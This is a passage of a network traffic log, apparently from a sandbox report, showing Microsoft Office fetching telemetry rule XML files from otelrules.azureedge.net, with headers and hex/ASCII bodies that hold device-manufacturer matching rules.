T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.4	49773	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:02 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:02 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:02 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: 2173f510-c01e-000b-3b58-2ee255000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174602Z-15869dbbcc6xcpf8hC1DFWxtx000000005e000000000af2x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:46:02 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	49774	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:02 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:02 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:02 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: 2e6eb393-601e-0097-4b00-2df33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174602Z-16547b76f7fcjqqhhC1DFWrrrc00000005eg00000000czxd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:02 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	49775	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:02 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:02 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:02 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 2d611ff0-901e-002a-3d01-2d7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174602Z-16547b76f7fx6rhxhC1DFW76kg00000005c000000000r25t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:46:02 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.4	49776	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:02 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:02 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:02 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 9e5bc133-001e-0065-6500-2f0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174602Z-17df447cdb5t94hvhC1DFWw97800000001tg000000009hcv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:02 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	49777	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:02 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:02 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:02 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: fb68cf1d-a01e-001e-3b01-2d49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174602Z-16547b76f7fxsvjdhC1DFWprrs00000005d000000000b3gn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:46:02 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	49778	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:03 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:03 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:03 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 1504f0f6-801e-0015-3c58-2ef97f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174603Z-17df447cdb56j5xmhC1DFWn91800000001m000000000srhm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:03 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	49780	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:03 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:03 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:03 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 959a3585-901e-0067-5ae9-2eb5cb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174603Z-17df447cdb5g2j9ghC1DFWev0800000001dg00000000sgbw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:03 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	49779	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:03 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:03 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:03 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 9771d805-c01e-0046-2c5c-2e2db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174603Z-17df447cdb57srlrhC1DFWwgas00000001rg00000000gpv1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:03 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	49781	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:03 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:03 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:03 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: ac6bbd40-501e-007b-3e0c-2d5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174603Z-16547b76f7f7scqbhC1DFW0m5w00000005c0000000006y5v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:03 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49784	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:04 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:04 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:04 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: e9345fcb-701e-005c-595f-2ebb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174604Z-17df447cdb5g2j9ghC1DFWev0800000001h000000000dcwx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:04 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49787	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:04 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:04 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:04 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: e93469fd-701e-005c-665f-2ebb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174604Z-17df447cdb5lrwcchC1DFWphes00000001p000000000f1t8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:04 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49783	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:04 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:04 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:04 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 100aec20-201e-006e-1215-2dbbe3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174604Z-16547b76f7fmbrhqhC1DFWkds800000005c000000000ybq4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:04 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 